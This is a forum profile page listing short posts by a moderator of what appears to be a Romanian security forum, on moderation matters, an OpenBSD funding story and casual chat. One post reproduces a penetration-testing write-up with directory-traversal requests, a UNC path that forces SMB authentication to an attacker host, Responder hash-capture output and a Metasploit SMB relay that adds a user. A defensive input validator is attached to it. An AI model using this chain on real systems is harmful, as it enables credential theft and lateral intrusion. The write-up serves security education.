malsploit
Moderators
  • Posts: 1965
  • Days Won: 20

Everything posted by malsploit

  1. A mysterious Bitcoin-powered white knight is reported to have come to the rescue of the struggling OpenBSD Foundation. Described as a Romanian billionaire, an individual named Mircea Popescu has offered to bail out the OpenBSD Foundation. The Foundation responsible for maintaining OpenBSD is $20,000 in the red over an electricity bill for powering the servers which host the operating system. As yet, Popescu does not feature on the OpenBSD list of “significant” Foundation sponsors. In an IRC session on January 19 Popescu had asked how to make a donation. On a #Bitcoin-assets IRC here, he made a comment that’s been taken as read that he had donated. “And it pleases me to announce openbsd got itself sponsored,” he wrote. Last week the OpenBSD Foundation said it would close down unless it received money to pay off their server ‘leccy bill. The group also asked for somebody to take permanent responsibility for picking up the tab. “OpenBSD will shut down if we do not have the funding to keep the lights on,” OpenBSD developer Bob Beck said in an email to OpenBSD followers on January 14. “We are looking at a significant shortfall for the upcoming year – meaning the project won’t be able to cover 20 thousand dollars in electrical expenses before being able to use money for other things. That sort of situation is not sustainable,” Beck wrote. OpenBSD is important because it’s widely used in firewalls, other edge servers, email, DNS and intrusion detection servers for its security. It’s also included in a number of popular third-party packages that include SQL Lite, BIND, Sendmail and the Lynx web browser. ® Romanian Bitcoin baron 'stumps up $20k to keep OpenBSD's lights on' • The Register https://twitter.com/Mircea_Popescu
  2. So, you have an IPS… And an AV…(II) - Infosec Reactions //hate.me submitted this
  3. It can't be done. Try to find weak points in the user, not in the application. Try to get access to the computer. The access doesn't necessarily have to be physical.
  4. We don't do this kind of thing on rst. Show us a little respect! //it's not about Metin. If you want to share something with rst, you have to do it properly. If you had run a competition with clues, CTF-style, I wouldn't have said anything. You can't just throw out a URL and expect someone to find a folder for you. You could have left some instructions in the source, for example.
  5. It wasn't a compliment. I was referring to that wooden language. What you say there is somewhat true, but it sounds...
  6. You talk like a computer science teacher
  7. I got one with Marius too. I also got them with Paul and Alex: "paul/alex do you like what I bought myself"
  8. It's about a URL shortener and a traffic exchange service.
  9. If it's an SE attempt you get a red card
  10. http://thecodinglove.com/post/60191739460/when-i-put-my-code-in-production-and-it-fails
  11. Those are the contact addresses of the creators of the libraries used.
  12. is it morning? She's complaining that Voyo deletes the series that the girl in question, her cousin, paid to watch.
  13. The space goes after the comma, not before it. There are huge interests at stake. Disinformation is spread, fake news is created and "swallowed" by the mass media. The mass media, sometimes unconsciously, lets itself be manipulated by the "great powers". It's like a magician who with one hand shows you the assistant dressed in a swimsuit. If you look at her, he's fooled you. Înscenarea (1997) - IMDb
  14. For some reason I've recently run into a number of web applications that allow for either directory traversal or filename manipulation attacks. These issues are typically used to expose web server specific files and sensitive information files (web.config, salaryreport.pdf, etc.) and/or operating system files (SYSTEM, SAM, etc.). Here's what a typical vulnerable request looks like:

          GET /Print/FileReader.aspx?Id=report1.pdf&Type=pdf HTTP/1.1
          Host: example.com
          Accept: application/x-ms-application, image/jpeg, application/xaml+xml, image/gif, image/pjpeg, application/x-ms-xbap, */*
          Accept-Language: en-US
          User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/6.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; InfoPath.3)
          Accept-Encoding: gzip, deflate
          Proxy-Connection: Keep-Alive
          Cookie: ASP.NET_SessionId=ofaj1zdqr40rl2tjtpt3y1lf;

      Note the Id parameter in the URL. This is the vulnerable parameter that we will be attacking. We could easily change report1.pdf to any other file in the web directory (report2.pdf, web.config, etc.), but we can also turn our attack against the operating system. Here's an example request for the win.ini file from the web server:

          GET /Print/FileReader.aspx?Id=..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\windows\win.ini&Type=pdf HTTP/1.1
          Host: example.com
          Accept: application/x-ms-application, image/jpeg, application/xaml+xml, image/gif, image/pjpeg, application/x-ms-xbap, */*
          Accept-Language: en-US
          User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/6.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; InfoPath.3)
          Accept-Encoding: gzip, deflate
          Proxy-Connection: Keep-Alive
          Cookie: ASP.NET_SessionId=ofaj1zdqr40rl2tjtpt3y1lf;

      This is a more traditional directory traversal attack. We're moving up several directories so that we can go back into the Windows directory. Directory traversal attacks have been around for a long time, so this may be a pretty familiar concept. Now that we have the basic concepts out of the way, let's see how we can leverage it against internally deployed web applications.

      Internally deployed web applications can allow for a much wider attack area (RDP, SMB, etc.) against the web server. This also makes directory traversal and file specification attacks more interesting. Instead of just accessing arbitrary files on the system, why don't we try and access other systems in the environment. In order to pivot this attack to other systems on the network, we will be utilizing UNC file paths to capture and/or relay SMB credentials. As a point of clarification, the following examples are against web servers that are running on Windows. Following our previous examples, we will be using a UNC path to our attacking host, instead of report1.pdf for the parameter. Here's an example request:

          GET /Print/FileReader.aspx?Id=\\192.168.1.123\test.pdf&Type=pdf HTTP/1.1
          Host: example.com
          Accept: application/x-ms-application, image/jpeg, application/xaml+xml, image/gif, image/pjpeg, application/x-ms-xbap, */*
          Accept-Language: en-US
          User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/6.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; InfoPath.3)
          Accept-Encoding: gzip, deflate
          Proxy-Connection: Keep-Alive
          Cookie: ASP.NET_SessionId=ofaj1zdqr40rl2tjtpt3y1lf;

      This will force the web server to look for test.pdf at 192.168.1.123. This will allow us to capture and crack the network hashes for the account running the web server service. Here's an example of how we would use https://github.com/SpiderLabs/Responder to do the SMB capture:

          python Responder.py -i eth0
          NBT Name Service/LLMNR Answerer 1.0.
          Please send bugs/comments to: lgaffie@trustwave.com
          To kill this script hit CRTL-C
          [+]NBT-NS & LLMNR responder started
          [+]Loading Responder.conf File..
          Global Parameters set:
          Responder is bound to this interface:eth0
          Challenge set is: 1122334455667788
          WPAD Proxy Server is:OFF
          WPAD script loaded:function FindProxyForURL(url, host){return 'PROXY ISAProxySrv:3141; DIRECT';}
          HTTP Server is:ON
          HTTPS Server is:ON
          SMB Server is:ON
          SMB LM support is set to:OFF
          SQL Server is:ON
          FTP Server is:ON
          DNS Server is:ON
          LDAP Server is:ON
          FingerPrint Module is:OFF
          Serving Executable via HTTP&WPAD is:OFF
          Always Serving a Specific File via HTTP&WPAD is:OFF
          [+]SMB-NTLMv2 hash captured from : 192.168.1.122
          Domain is : EXAMPLE
          User is : webserverservice
          [+]SMB complete hash is : webserverservice::EXAMPLE:1122334455667788:58D4DB26036DE56CB49237BFB9E418F8:01010000000000002A5FB1391FFCCE010F06DF8E6FE85EB20000000002000A0073006D006200310032000100140053004500520056004500520032003000300038000400160073006D006200310032002E006C006F00630061006C0003002C0053004500520056004500520032003000300038002E0073006D006200310032002E006C006F00630061006C000500160073006D006200310032002E006C006F00630061006C000800300030000000000000000000000000300000620DD0B514EA55632219A4B83D1D6AAA07659ABA3A4BB54577C7AEEB871A88B90A001000000000000000000000000000000000000900260063006900660073002F00310030002E003100300030002E003100300030002E003100330036000000000000000000
          Share requested: \\192.168.1.123\IPC$
          [+]SMB-NTLMv2 hash captured from : 192.168.1.122
          Domain is : EXAMPLE
          User is : webserverservice
          [+]SMB complete hash is : webserverservice[...]
          Share requested: \\192.168.1.123\test.pdf

      Once we've captured the credentials, we can try to crack them with oclHashcat - advanced password recovery. If the server responds with https://www.netspi.com/blog/entryid/63/automating-halflmchall-hash-cracking, you can use rainbow tables to speed things up. Once cracked, we can see where these credentials have access. Let's pretend that we are not able to crack the hash for the web server account.

      We can also try to relay these credentials to another host on the internal network (192.168.1.124) that the account may have access to. This can be done with the CVE-2008-4037 Microsoft Windows SMB Relay Code Execution module (Rapid7) within Metasploit, and Responder recently added support for SMB relay. In the example below, we will use the Metasploit module to add a local user to the target server (192.168.1.124). The typical usage/payload for the module is to get a Meterpreter shell on the target system.

          Module options (exploit/windows/smb/smb_relay):

             Name        Current Setting  Required  Description
             ----        ---------------  --------  -----------
             SHARE       ADMIN$           yes       The share to connect to
             SMBHOST     192.168.1.124    no        The target SMB server
             SRVHOST     192.168.1.123    yes       The local host to listen on.
             SRVPORT     445              yes       The local port to listen on.
             SSL         false            no        Negotiate SSL for incoming connections
             SSLCert                      no        Path to a custom SSL certificate
             SSLVersion  SSL3             no        Specify the version of SSL that should be used

          Payload options (windows/adduser):

             Name      Current Setting  Required  Description
             ----      ---------------  --------  -----------
             CUSTOM                     no        Custom group name to be used instead of default
             EXITFUNC  thread           yes       Exit technique: seh, thread, process, none
             PASS      Password123!     yes       The password for this user
             USER      netspi           yes       The username to create
             WMIC      false            yes       Use WMIC on the target to resolve administrators group

          Exploit running as background job.
          Server started.
          <------------Truncated------------>
          Received 192.168.1.122:21251 EXAMPLE\webserverservice LMHASH:b2--Truncated--03 NTHASH:46-- Truncated --00 OS: LM:
          Authenticating to 192.168.1.124 as EXAMPLE\webserverservice...
          AUTHENTICATED as EXAMPLE\webserverservice...
          Connecting to the defined share...
          Regenerating the payload...
          Uploading payload...
          Created \OemWSPRa.exe...
          Connecting to the Service Control Manager...
          Obtaining a service manager handle...
          Creating a new service...
          Closing service handle...
          Opening service...
          Starting the service...
          Removing the service...
          Closing service handle...
          Deleting \OemWSPRa.exe...
          Sending Access Denied to 192.168.1.122:21251 EXAMPLE\webserverservice

      https://www.netspi.com/blog/entryid/213/smb-attacks-through-directory-traversal
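As an added defender-side example (not code from the post above or from NetSPI), this is the validation a FileReader-style handler should apply to its Id parameter before calling any file API, so that the traversal and UNC values shown in the post are refused and the server can never be made to open an outbound SMB connection; DOC_ROOT, ALLOWED_EXT and safe_document_path are assumed names. PureWindowsPath is used so Windows path rules (drive letters, UNC roots, both slash types) apply wherever the check is run.

```python
"""Input validation for a file-serving endpoint such as FileReader.aspx.
Added defensive example, not from the forum post or from NetSPI."""
from pathlib import PureWindowsPath
from typing import Optional
from urllib.parse import unquote

# Hypothetical document root of the handler and the extensions it may serve.
DOC_ROOT = PureWindowsPath(r"C:\inetpub\wwwroot\Print\docs")
ALLOWED_EXT = {".pdf", ".txt"}


def safe_document_path(user_value: str) -> Optional[PureWindowsPath]:
    """Return the on-disk path to serve for Id, or None to reject the value."""
    # Decode repeatedly so double-encoded sequences (%252e%252e) cannot hide
    # a traversal from the later checks.
    decoded = user_value
    for _ in range(3):
        nxt = unquote(decoded)
        if nxt == decoded:
            break
        decoded = nxt
    # Empty names and NUL bytes are rejected: some file APIs truncate at NUL.
    if not decoded or "\x00" in decoded:
        return None
    # Treat forward slashes as separators too; Windows accepts both.
    p = PureWindowsPath(decoded.replace("/", "\\"))
    # Absolute paths, drive letters (C:\...) and UNC roots (\\host\share\...)
    # all produce a drive or anchor; a plain file name has neither.
    if p.drive or p.anchor:
        return None
    # Only a bare file name is expected: no directory components, no "..".
    if len(p.parts) != 1 or p.name in ("", ".", ".."):
        return None
    if p.suffix.lower() not in ALLOWED_EXT:
        return None
    final = DOC_ROOT / p.name
    # Defence in depth: the resolved path must sit directly under DOC_ROOT.
    if final.parent != DOC_ROOT:
        return None
    return final


if __name__ == "__main__":
    # Constructed inputs mirroring the requests shown in the post above.
    for value in ("report1.pdf", r"..\..\windows\win.ini",
                  r"\\192.168.1.123\test.pdf", "%2e%2e%5cweb.config"):
        print(repr(value), "->", safe_document_path(value))
```

Rejections should also be logged with the raw parameter value, since a UNC or traversal string in the Id parameter is the detection signal for the attack described in the post.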
  15. An online casino can manipulate the results however it wants. I played roulette on bet365 and there were cases where I had 10 consecutive losing hands, regardless of strategy. Even if it works, you'll never have enough money to cover it.
  16. Is that how you point out that the thread is old?:
  17. Refrain from posts like this. Nobody cares that you're going to try it or that you've tried it. Give quality feedback to motivate the program's creator. If you find bugs or have suggestions, you're free to post.
  18. I hope you're trying to fool someone. If you've been registered on rst since 2007 and still believe these stories, that's pretty serious.
  19. We're closing it because the index is getting spammed again.
  20. This isn't hi5! Have a little respect for the staff members! You could have sent him a private message.
  21. You don't need help. You need basic information in the field, which you have to find on your own, just like we did. Closing, warning, moving to the trash.
  22. https://www.facebook.com/photo.php?v=383921101747624
  23. Zatarra, sorry to ruin your business. We're closing it and moving it to the trash.